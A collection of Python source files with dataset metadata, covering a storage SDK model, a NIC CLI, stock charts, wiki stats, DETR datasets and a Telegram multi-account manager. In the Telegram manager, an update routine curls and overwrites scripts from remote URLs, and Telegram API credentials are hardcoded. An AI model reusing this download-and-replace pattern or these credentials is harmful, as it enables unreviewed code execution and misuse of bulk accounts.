| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60a47f3e241e5f669273b6d0c92cbb5374b0f349
| 3,970
|
py
|
Python
|
cohesity_management_sdk/models/scheduling_policy.py
|
chandrashekar-cohesity/management-sdk-python
|
9e6ec99e8a288005804b808c4e9b19fd204e3a8b
|
[
"Apache-2.0"
] | 1
|
2021-01-07T20:36:22.000Z
|
2021-01-07T20:36:22.000Z
|
cohesity_management_sdk/models/scheduling_policy.py
|
chandrashekar-cohesity/management-sdk-python
|
9e6ec99e8a288005804b808c4e9b19fd204e3a8b
|
[
"Apache-2.0"
] | null | null | null |
cohesity_management_sdk/models/scheduling_policy.py
|
chandrashekar-cohesity/management-sdk-python
|
9e6ec99e8a288005804b808c4e9b19fd204e3a8b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2019 Cohesity Inc.
import cohesity_management_sdk.models.continuous_schedule
import cohesity_management_sdk.models.daily_schedule
import cohesity_management_sdk.models.monthly_schedule
import cohesity_management_sdk.models.rpo_schedule
class SchedulingPolicy(object):
"""Implementation of the 'SchedulingPolicy' model.
Specifies settings that define a backup schedule for a Protection Job.
Attributes:
continuous_schedule (ContinuousSchedule): Specifies the time interval
between two Job Runs of a continuous backup schedule and any
blackout periods when new Job Runs should NOT be started. Set if
periodicity is kContinuous.
daily_schedule (DailySchedule): Specifies a daily or weekly backup
schedule. Set if periodicity is kDaily.
monthly_schedule (MonthlySchedule): Specifies a monthly backup
schedule. Set if periodicity is kMonthly.
periodicity (PeriodicityEnum): Specifies how often to start new Job
Runs of a Protection Job. 'kDaily' means new Job Runs start daily.
'kMonthly' means new Job Runs start monthly. 'kContinuous' means
new Job Runs repetitively start at the beginning of the specified
time interval (in hours or minutes). 'kContinuousRPO' means this
is an RPO schedule.
rpo_schedule (RpoSchedule): Specifies an RPO backup schedule. Set if
periodicity is kContinuousRPO.
"""
# Create a mapping from Model property names to API property names
_names = {
"continuous_schedule":'continuousSchedule',
"daily_schedule":'dailySchedule',
"monthly_schedule":'monthlySchedule',
"periodicity":'periodicity',
"rpo_schedule":'rpoSchedule'
}
def __init__(self,
continuous_schedule=None,
daily_schedule=None,
monthly_schedule=None,
periodicity=None,
rpo_schedule=None):
"""Constructor for the SchedulingPolicy class"""
# Initialize members of the class
self.continuous_schedule = continuous_schedule
self.daily_schedule = daily_schedule
self.monthly_schedule = monthly_schedule
self.periodicity = periodicity
self.rpo_schedule = rpo_schedule
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
continuous_schedule = cohesity_management_sdk.models.continuous_schedule.ContinuousSchedule.from_dictionary(dictionary.get('continuousSchedule')) if dictionary.get('continuousSchedule') else None
daily_schedule = cohesity_management_sdk.models.daily_schedule.DailySchedule.from_dictionary(dictionary.get('dailySchedule')) if dictionary.get('dailySchedule') else None
monthly_schedule = cohesity_management_sdk.models.monthly_schedule.MonthlySchedule.from_dictionary(dictionary.get('monthlySchedule')) if dictionary.get('monthlySchedule') else None
periodicity = dictionary.get('periodicity')
rpo_schedule = cohesity_management_sdk.models.rpo_schedule.RpoSchedule.from_dictionary(dictionary.get('rpoSchedule')) if dictionary.get('rpoSchedule') else None
# Return an object of this model
return cls(continuous_schedule,
daily_schedule,
monthly_schedule,
periodicity,
rpo_schedule)
| 43.152174
| 203
| 0.688917
| 423
| 3,970
| 6.319149
| 0.269504
| 0.041152
| 0.062851
| 0.080808
| 0.195286
| 0.166106
| 0
| 0
| 0
| 0
| 0
| 0.001682
| 0.251134
| 3,970
| 91
| 204
| 43.626374
| 0.89741
| 0.429975
| 0
| 0
| 0
| 0
| 0.125951
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052632
| false
| 0
| 0.105263
| 0
| 0.263158
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60a5c5419df750bc2b6508ae2377a189aff71a1a
| 3,575
|
py
|
Python
|
networking_mlnx/eswitchd/cli/ebrctl.py
|
mail2nsrajesh/networking-mlnx
|
9051eac0c2bc6abf3c8790e01917e405dc479922
|
[
"Apache-2.0"
] | null | null | null |
networking_mlnx/eswitchd/cli/ebrctl.py
|
mail2nsrajesh/networking-mlnx
|
9051eac0c2bc6abf3c8790e01917e405dc479922
|
[
"Apache-2.0"
] | null | null | null |
networking_mlnx/eswitchd/cli/ebrctl.py
|
mail2nsrajesh/networking-mlnx
|
9051eac0c2bc6abf3c8790e01917e405dc479922
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# Copyright 2013 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
from networking_mlnx.eswitchd.cli import conn_utils
from networking_mlnx.eswitchd.cli import exceptions
client = conn_utils.ConnUtil()
def parse():
"""Main method that manages supported CLI commands.
The actions that are supported throught the CLI are:
write-sys, del-port, allocate-port and add-port
Each action is matched with method that should handle it
e.g. write-sys action is matched with write_sys method
"""
parser = argparse.ArgumentParser(prog='ebrctl')
parser.add_argument('action', action='store_true')
parent_parser = argparse.ArgumentParser(add_help=False)
parent_parser.add_argument('vnic_mac')
parent_parser.add_argument('device_id')
parent_parser.add_argument('fabric')
parent_parser.add_argument('vnic_type')
subparsers = parser.add_subparsers()
parser_add_port = subparsers.add_parser('add-port',
parents=[parent_parser])
parser_add_port.add_argument('dev_name')
parser_add_port.set_defaults(func=add_port)
parser_add_port = subparsers.add_parser('allocate-port',
parents=[parent_parser])
parser_add_port.set_defaults(func=allocate_port)
parser_del_port = subparsers.add_parser('del-port')
parser_del_port.set_defaults(func=del_port)
parser_del_port.add_argument('fabric')
parser_del_port.add_argument('vnic_mac')
parser_write_sys = subparsers.add_parser('write-sys')
parser_write_sys.set_defaults(func=write_sys)
parser_write_sys.add_argument('path')
parser_write_sys.add_argument('value')
args = parser.parse_args()
args.func(args)
def allocate_port(args):
try:
dev = client.allocate_nic(args.vnic_mac, args.device_id,
args.fabric, args.vnic_type)
except exceptions.MlxException as e:
sys.stderr.write("Error in allocate command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def add_port(args):
try:
dev = client.plug_nic(args.vnic_mac, args.device_id, args.fabric,
args.vnic_type, args.dev_name)
except exceptions.MlxException as e:
sys.stderr.write("Error in add-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.stdout.write(dev)
sys.exit(0)
def del_port(args):
try:
client.deallocate_nic(args.vnic_mac, args.fabric)
except exceptions.MlxException as e:
sys.stderr.write("Error in del-port command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def write_sys(args):
try:
fd = open(args.path, 'w')
fd.write(args.value)
fd.close()
except Exception as e:
sys.stderr.write("Error in write-sys command")
sys.stderr.write(e.message)
sys.exit(1)
sys.exit(0)
def main():
parse()
| 30.555556
| 73
| 0.683636
| 497
| 3,575
| 4.748491
| 0.295775
| 0.045763
| 0.047458
| 0.038983
| 0.434746
| 0.32161
| 0.24661
| 0.205932
| 0.205932
| 0.205932
| 0
| 0.005722
| 0.217902
| 3,575
| 116
| 74
| 30.818966
| 0.83834
| 0.235804
| 0
| 0.323944
| 0
| 0
| 0.083612
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084507
| false
| 0
| 0.056338
| 0
| 0.140845
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60a739a78fd701a33047ec6e80de5f418140cf06
| 2,567
|
py
|
Python
|
src/FinanceLib/analysis.py
|
Chahat-M/FinanceLib
|
0428779220a97e7fe0ad35a50207b737059b9c86
|
[
"MIT"
] | 3
|
2021-06-20T14:55:16.000Z
|
2021-12-29T03:55:34.000Z
|
src/FinanceLib/analysis.py
|
Chahat-M/FinanceLib
|
0428779220a97e7fe0ad35a50207b737059b9c86
|
[
"MIT"
] | null | null | null |
src/FinanceLib/analysis.py
|
Chahat-M/FinanceLib
|
0428779220a97e7fe0ad35a50207b737059b9c86
|
[
"MIT"
] | 1
|
2021-06-26T05:39:08.000Z
|
2021-06-26T05:39:08.000Z
|
from typing import List, Union
import numpy as np
import pandas_datareader as pdr
import pandas as pd
import matplotlib.pyplot as plt
def rsi(symbol :str ,name :str, date :str) -> None :
"""
Calculates and visualises the Relative Stock Index on a Stock of the company.
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
name(str) : Name of the company
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
rsi('GOOG','Google','2020,01,01')
"""
ticker : str = pdr.get_data_yahoo(symbol, date)
delta : List[float] = ticker['Close'].diff()
up : int = delta.clip(lower=0)
down : int = -1*delta.clip(upper=0)
ema_up : Union[bool,float]= up.ewm(com=13, adjust=False).mean()
ema_down : Union[bool,float] = down.ewm(com=13, adjust=False).mean()
rs : float = ema_up/ema_down
ticker['RSI'] = 100 - (100/(1 + rs))
ticker : list = ticker.iloc[14:]
print(ticker)
fig, (ax1, ax2) = plt.subplots(2)
ax1.get_xaxis().set_visible(False)
fig.suptitle(name)
ticker['Close'].plot(ax=ax1)
ax1.set_ylabel('Price ($)')
ticker['RSI'].plot(ax=ax2)
ax2.set_ylim(0,100)
ax2.axhline(30, color='r', linestyle='--')
ax2.axhline(70, color='r', linestyle='--')
ax2.set_ylabel('RSI')
plt.show()
def volatility(symbol :str, date :str) ->None:
"""
Measures and visualizes the Volatility of a Stock by calculating the Average True Range(ATR)
Parameters:
symbol(str) : Symbol of the company from https://in.finance.yahoo.com/
date(str) : start date of historical data in the format (YYYY,M,D)
Returns:
Return type: void
Example:
volatility('GOOG','2020,01,01')
"""
data : str = pdr.get_data_yahoo(symbol,date)
data.head()
high_low : Union[int,float]= data['High'] - data['Low']
high_cp : List[float] = np.abs(data['High'] - data['Close'].shift())
low_cp : List[float]= np.abs(data['Low'] - data['Close'].shift())
df : List[str] = pd.concat([high_low, high_cp, low_cp], axis=1)
true_range : float= np.max(df, axis=1)
average_true_range : float= true_range.rolling(14).mean()
average_true_range
true_range.rolling(14).sum()/14
fig, ax = plt.subplots()
average_true_range.plot(ax=ax)
ax2 : Union[bool,float]= data['Close'].plot(ax=ax, secondary_y=True, alpha=.3)
ax.set_ylabel("ATR")
ax2.set_ylabel("Price")
plt.show()
| 34.689189
| 96
| 0.626023
| 382
| 2,567
| 4.123037
| 0.332461
| 0.04
| 0.030476
| 0.017778
| 0.267937
| 0.267937
| 0.213333
| 0.177778
| 0.177778
| 0.177778
| 0
| 0.030923
| 0.218933
| 2,567
| 74
| 97
| 34.689189
| 0.754613
| 0.270355
| 0
| 0.045455
| 0
| 0
| 0.039955
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.113636
| 0
| 0.159091
| 0.022727
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60ae786acbdf645e9d5e08b60bc5b3249a338b60
| 6,496
|
py
|
Python
|
jarvis/stats.py
|
aburgd/sheila
|
556cf3e4a6992b8ba609ba281f5a3657cd91e709
|
[
"MIT"
] | null | null | null |
jarvis/stats.py
|
aburgd/sheila
|
556cf3e4a6992b8ba609ba281f5a3657cd91e709
|
[
"MIT"
] | null | null | null |
jarvis/stats.py
|
aburgd/sheila
|
556cf3e4a6992b8ba609ba281f5a3657cd91e709
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
###############################################################################
# Module Imports
###############################################################################
import pyscp
import textwrap
from dominate import tags as dt
from . import core, lex, ext
###############################################################################
# Templates
###############################################################################
CHART = """
google.charts.setOnLoadCallback({name});
function {name}() {{
var data = new google.visualization.arrayToDataTable([
{data}
]);
var options = {options};
var chart = new google.visualization.{class_name}(
document.getElementById('{name}'));
chart.draw(data, options);
}}
"""
USER = """
[[html]]
<base target="_parent" />
<style type="text/css">
@import url(http://scp-stats.wdfiles.com/local--theme/scp-stats/style.css);
</style>
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js">
</script>
<script type="text/javascript">
google.charts.load('current', {{'packages':['table', 'corechart']}});
{summary_table}
{articles_chart}
{articles_table}
</script>
<div id="summary_table"></div>
<div id="articles_chart"></div>
<div style="clear: both;"></div>
<h4>Articles</h4>
<div id="articles_table"></div>
[[/html]]
"""
###############################################################################
# Helper Functions
###############################################################################
def html(tag, text, **kwargs):
if 'cls' in kwargs:
kwargs['class'] = kwargs.pop('cls')
attrs = ' '.join('{}="{}"'.format(k, v) for k, v in kwargs.items())
if attrs:
attrs = ' ' + attrs
return '<{tag}{attrs}>{text}</{tag}>'.format(
tag=tag, text=text, attrs=attrs)
###############################################################################
# Chart Classes
###############################################################################
class Chart:
def format_row(self, row, indent):
row = ',\n'.join(map(repr, row))
row = textwrap.indent(row, ' ')
row = '[\n{}\n]'.format(row)
return textwrap.indent(row, ' ' * indent)
def render(self):
data = ',\n'.join([self.format_row(r, 8) for r in self.data])
return CHART.format(
name=self.name,
class_name=self.class_name,
data=data,
options=self.options)
class SummaryTable(Chart):
def __init__(self, pages, name):
self.name = 'summary_table'
self.class_name = 'Table'
self.populate(pages, name)
self.options = {
'sort': 'disable',
'width': '100%'}
def populate(self, pages, name):
self.data = [
['Category', 'Page Count', 'Net Rating', 'Average'],
['Total', pages.count, pages.rating, pages.average]]
for k, v in pages.split_page_type().items():
self.data.append([k, v.count, v.rating, v.average])
for k, v in pages.split_relation(name).items():
self.data.append([k, v.count, v.rating, v.average])
class ArticlesChart(Chart):
def __init__(self, pages, user):
self.name = 'articles_chart'
self.class_name = 'ColumnChart'
self.user = user
self.populate(pages)
self.options = {
'backgroundColor': '#e7e9dc',
'chartArea': {
'left': 0,
'top': 0,
'width': '100%',
'height': '100%'},
'hAxis': {'textPosition': 'none'},
'vAxis': {
'textPosition': 'none',
'gridlines': {'color': '#e7e9dc'},
'minValue': 0},
'legend': {'position': 'none'},
'height': 350,
'tooltip': {'isHtml': 1}}
def populate(self, pages):
self.data = [[
'Title',
'Rating',
{'role': 'tooltip', 'p': {'html': 'true'}},
{'role': 'style'}]]
for p in pages:
if 'scp' in p.tags:
color = 'color: #db4437'
elif 'tale' in p.tags:
color = 'color: #4285f4'
else:
color = 'color: #f4b400'
date = p.metadata[self.user].date[:10] or '-'
tooltip = dt.table(
dt.tr(dt.td(p.title, colspan=2)),
dt.tr(dt.td('Rating:'), dt.td(p.rating)),
dt.tr(dt.td('Created:'), dt.td(date)),
cls='articles_chart_tooltip')
self.data.append([
p.title,
p.rating,
tooltip.render(pretty=False),
color])
class ArticlesTable(Chart):
def __init__(self, pages, user):
self.name = 'articles_table'
self.class_name = 'Table'
self.populate(pages, user)
self.options = {
'showRowNumber': 1,
'allowHtml': 1,
'sortColumn': 1,
'sortAscending': 0,
'width': '100%'}
def populate(self, pages, user):
self.data = ['Title Rating Tags Link Created Role'.split()]
for p in pages:
tags = [html('b', t) if t in 'scp tale hub admin author' else t
for t in p.tags]
tags = ', '.join(sorted(tags))
link = html('a', p.url.split('/')[-1], href=p.url)
role = p.metadata[user].role
role = html('span', role, cls='rel-' + role)
date = p.metadata[user].date[:10]
self.data.append([p.title, p.rating, tags, link, date, role])
###############################################################################
def update_user(name):
wiki = pyscp.wikidot.Wiki('scp-stats')
wiki.auth(core.config.wiki.name, core.config.wiki.password)
p = wiki('user:' + name.lower())
pages = sorted(
core.pages.related(name),
key=lambda x: (x.metadata[name].date, x.created))
pages = ext.PageView(pages)
if not pages.articles:
return lex.not_found.author
data = USER.format(
summary_table=SummaryTable(pages.primary(name), name).render(),
articles_chart=ArticlesChart(pages.articles, name).render(),
articles_table=ArticlesTable(
[p for p in pages if p.tags], name).render())
p.create(data, title=name, comment='automated update')
return p.url
| 28.121212
| 79
| 0.475985
| 672
| 6,496
| 4.541667
| 0.287202
| 0.023591
| 0.017038
| 0.006881
| 0.155963
| 0.129423
| 0.111075
| 0.079948
| 0.053735
| 0.026868
| 0
| 0.010487
| 0.26601
| 6,496
| 230
| 80
| 28.243478
| 0.629614
| 0.011853
| 0
| 0.107595
| 0
| 0.012658
| 0.262844
| 0.065053
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063291
| false
| 0.006329
| 0.031646
| 0
| 0.151899
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b1ecdd22ff60b0f76eb9a849e552628f551e26
| 6,547
|
py
|
Python
|
python/manager.py
|
Kiku-Reise/vsmart
|
dd8cf84816da8734e72dbb46c07694f561597648
|
[
"Apache-2.0"
] | null | null | null |
python/manager.py
|
Kiku-Reise/vsmart
|
dd8cf84816da8734e72dbb46c07694f561597648
|
[
"Apache-2.0"
] | null | null | null |
python/manager.py
|
Kiku-Reise/vsmart
|
dd8cf84816da8734e72dbb46c07694f561597648
|
[
"Apache-2.0"
] | null | null | null |
from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, os
from colorama import init, Fore
from time import sleep
init()
n = Fore.RESET
lg = Fore.LIGHTGREEN_EX
r = Fore.RED
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
colors = [lg, r, w, cy, ye]
try:
import requests
except ImportError:
print(f'{lg}[i] Installing module - requests...{n}')
os.system('pip install requests')
def banner():
import random
# fancy logo
b = [
' _____ __',
' / _ \ _______/ |_____________',
' / /_\ \ / ___/\ __\_ __ \__ \\',
'/ | \ \___ \ | | | | \// __ \_',
'\____|__ /____ > |__| |__| (____ /',
' \/ \/ \/'
]
for char in b:
print(f'{random.choice(colors)}{char}{n}')
#print('=============SON OF GENISYS==============')
print(f' Version: 1.2 | Author: Cryptonian{n}\n')
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
while True:
clr()
banner()
print(lg+'[1] Add new accounts'+n)
print(lg+'[2] Filter all banned accounts'+n)
print(lg+'[3] Delete specific accounts'+n)
print(lg+'[4] Update your Astra'+n)
print(lg+'[5] Quit'+n)
a = int(input('\nEnter your choice: '))
if a == 1:
new_accs = []
with open('vars.txt', 'ab') as g:
number_to_add = int(input(f'\n{lg} [~] Enter number of accounts to add: {r}'))
for i in range(number_to_add):
phone_number = str(input(f'\n{lg} [~] Enter Phone Number: {r}'))
parsed_number = ''.join(phone_number.split())
pickle.dump([parsed_number], g)
new_accs.append(parsed_number)
print(f'\n{lg} [i] Saved all accounts in vars.txt')
clr()
print(f'\n{lg} [*] Logging in from new accounts\n')
for number in new_accs:
c = TelegramClient(f'sessions/{number}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
c.start(number)
print(f'{lg}[+] Login successful')
c.disconnect()
input(f'\n Press enter to goto main menu...')
g.close()
elif a == 2:
accounts = []
banned_accs = []
h = open('vars.txt', 'rb')
while True:
try:
accounts.append(pickle.load(h))
except EOFError:
break
h.close()
if len(accounts) == 0:
print(r+'[!] There are no accounts! Please add some and retry')
sleep(3)
else:
for account in accounts:
phone = str(account[0])
client = TelegramClient(f'sessions/{phone}', 3910389 , '86f861352f0ab76a251866059a6adbd6')
client.connect()
if not client.is_user_authorized():
try:
client.send_code_request(phone)
#client.sign_in(phone, input('[+] Enter the code: '))
print(f'{lg}[+] {phone} is not banned{n}')
except PhoneNumberBannedError:
print(r+str(phone) + ' is banned!'+n)
banned_accs.append(account)
if len(banned_accs) == 0:
print(lg+'Congrats! No banned accounts')
input('\nPress enter to goto main menu...')
else:
for m in banned_accs:
accounts.remove(m)
with open('vars.txt', 'wb') as k:
for a in accounts:
Phone = a[0]
pickle.dump([Phone], k)
k.close()
print(lg+'[i] All banned accounts removed'+n)
input('\nPress enter to goto main menu...')
elif a == 3:
accs = []
f = open('vars.txt', 'rb')
while True:
try:
accs.append(pickle.load(f))
except EOFError:
break
f.close()
i = 0
print(f'{lg}[i] Choose an account to delete\n')
for acc in accs:
print(f'{lg}[{i}] {acc[0]}{n}')
i += 1
index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
phone = str(accs[index][0])
session_file = phone + '.session'
if os.name == 'nt':
os.system(f'del sessions\\{session_file}')
else:
os.system(f'rm sessions/{session_file}')
del accs[index]
f = open('vars.txt', 'wb')
for account in accs:
pickle.dump(account, f)
print(f'\n{lg}[+] Account Deleted{n}')
input(f'\nPress enter to goto main menu...')
f.close()
elif a == 4:
# thanks to github.com/th3unkn0n for the snippet below
print(f'\n{lg}[i] Checking for updates...')
try:
# https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt
version = requests.get('https://raw.githubusercontent.com/Cryptonian007/Astra/main/version.txt')
except:
print(f'{r} You are not connected to the internet')
print(f'{r} Please connect to the internet and retry')
exit()
if float(version.text) > 1.1:
prompt = str(input(f'{lg}[~] Update available[Version {version.text}]. Download?[y/n]: {r}'))
if prompt == 'y' or prompt == 'yes' or prompt == 'Y':
print(f'{lg}[i] Downloading updates...')
if os.name == 'nt':
os.system('del add.py')
os.system('del manager.py')
else:
os.system('rm add.py')
os.system('rm manager.py')
#os.system('del scraper.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/add.py')
os.system('curl -l -O https://raw.githubusercontent.com/Cryptonian007/Astra/main/manager.py')
print(f'{lg}[*] Updated to version: {version.text}')
input('Press enter to exit...')
exit()
else:
print(f'{lg}[!] Update aborted.')
input('Press enter to goto main menu...')
else:
print(f'{lg}[i] Your Astra is already up to date')
input('Press enter to goto main menu...')
elif a == 5:
clr()
banner()
exit()
| 36.780899
| 109
| 0.494578
| 760
| 6,547
| 4.144737
| 0.264474
| 0.032381
| 0.022857
| 0.028571
| 0.193333
| 0.18254
| 0.136508
| 0.08
| 0.08
| 0.041905
| 0
| 0.022662
| 0.359707
| 6,547
| 177
| 110
| 36.988701
| 0.728769
| 0.040171
| 0
| 0.233129
| 0
| 0.018405
| 0.316075
| 0.022782
| 0
| 0
| 0
| 0
| 0
| 1
| 0.01227
| false
| 0
| 0.04908
| 0
| 0.06135
| 0.159509
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b2db27faa35c5bbae9711262c54fdad4d8f495
| 1,212
|
py
|
Python
|
src/m2ee/client_errno.py
|
rus-kh/m2ee-tools
|
70000796a53131bb1cd8d199f48cd5e7aab2c505
|
[
"BSD-3-Clause"
] | 23
|
2015-11-26T12:05:45.000Z
|
2022-03-17T10:24:22.000Z
|
src/m2ee/client_errno.py
|
rus-kh/m2ee-tools
|
70000796a53131bb1cd8d199f48cd5e7aab2c505
|
[
"BSD-3-Clause"
] | 54
|
2016-07-26T12:44:07.000Z
|
2022-02-17T10:08:01.000Z
|
src/m2ee/client_errno.py
|
rus-kh/m2ee-tools
|
70000796a53131bb1cd8d199f48cd5e7aab2c505
|
[
"BSD-3-Clause"
] | 34
|
2015-01-04T07:05:48.000Z
|
2022-02-15T10:23:52.000Z
|
#
# Copyright (C) 2009 Mendix. All rights reserved.
#
SUCCESS = 0
# Starting the Mendix Runtime can fail in both a temporary or permanent way.
# Some of the errors can be fixed with some help of the user.
#
# The default m2ee cli program will only handle a few of these cases, by
# providing additional hints or interactive choices to fix the situation and
# will default to echoing back the error message received from the runtime.
# Database to be used does not exist
start_NO_EXISTING_DB = 2
# Database structure is out of sync with the application domain model, DDL
# commands need to be run to synchronize the database.
start_INVALID_DB_STRUCTURE = 3
# Constant definitions used in the application model are missing from the
# configuration.
start_MISSING_MF_CONSTANT = 4
# In the application database, a user account was detected which has the
# administrative role (as specified in the modeler) and has password '1'.
start_ADMIN_1 = 5
# ...
start_INVALID_STATE = 6
start_MISSING_DTAP = 7
start_MISSING_BASEPATH = 8
start_MISSING_RUNTIMEPATH = 9
start_INVALID_LICENSE = 10
start_SECURITY_DISABLED = 11
start_STARTUP_ACTION_FAILED = 12
start_NO_MOBILE_IN_LICENSE = 13
check_health_INVALID_STATE = 2
| 30.3
| 76
| 0.792079
| 194
| 1,212
| 4.778351
| 0.623711
| 0.05178
| 0.03452
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024728
| 0.165842
| 1,212
| 39
| 77
| 31.076923
| 0.892186
| 0.657591
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b31fb7e46f9a498f1975750fe02489646c609d
| 2,456
|
py
|
Python
|
datasets/__init__.py
|
andrewliao11/detr
|
944bb60e090e6b72aede9574cd2b7f75202cfe05
|
[
"Apache-2.0"
] | null | null | null |
datasets/__init__.py
|
andrewliao11/detr
|
944bb60e090e6b72aede9574cd2b7f75202cfe05
|
[
"Apache-2.0"
] | null | null | null |
datasets/__init__.py
|
andrewliao11/detr
|
944bb60e090e6b72aede9574cd2b7f75202cfe05
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import torch.utils.data
import torchvision
def get_coco_api_from_dataset(dataset_val):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset_val, torch.utils.data.Subset):
dataset_val = dataset_val.dataset
if isinstance(dataset_val, torchvision.datasets.CocoDetection):
return dataset_val.coco
def get_class_mapping(dataset):
for _ in range(10):
# if isinstance(dataset, torchvision.datasets.CocoDetection):
# break
if isinstance(dataset, torch.utils.data.Subset):
dataset = dataset.dataset
if isinstance(dataset, torchvision.datasets.CocoDetection):
return {d["id"]: d["name"].lower() for d in dataset.coco.dataset["categories"]}
def build_dataset(image_set, dataset_args, given_class_mapping=None):
if dataset_args.name in ['mscoco14', 'mscoco17']:
from .coco import build as build_coco
return build_coco(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'virtual_kitti':
from .virtual_kitti import build as build_vkitti
return build_vkitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
#elif dataset_args.name == 'viper':
# from .viper import build as build_viper
# return build_viper(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'kitti':
from .kitti import build as build_kitti
return build_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'mixed_kitti_virtual_kitti':
from .mixed_kitti_virtual_kitti import build as build_mixed_kitti_virtual_kitti
return build_mixed_kitti_virtual_kitti(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'synscapes':
from .synscapes import build as build_synscapes
return build_synscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
elif dataset_args.name == 'cityscapes':
from .cityscapes import build as build_cityscapes
return build_cityscapes(image_set, dataset_args, given_class_mapping=given_class_mapping)
else:
raise ValueError(f'dataset {dataset_args.name} not supported')
| 47.230769
| 112
| 0.733713
| 316
| 2,456
| 5.39557
| 0.199367
| 0.11261
| 0.14956
| 0.08915
| 0.54956
| 0.478592
| 0.41349
| 0.392375
| 0.392375
| 0.392375
| 0
| 0.004014
| 0.188518
| 2,456
| 51
| 113
| 48.156863
| 0.85148
| 0.151873
| 0
| 0.057143
| 0
| 0
| 0.065092
| 0.012054
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085714
| false
| 0
| 0.228571
| 0
| 0.542857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
60b3e5f9c1bddecc88bf9ce4ae8e78ecc1b7e1ee
| 11,139
|
py
|
Python
|
dkhomeleague/dkhomeleague.py
|
sansbacon/dkhomeleague
|
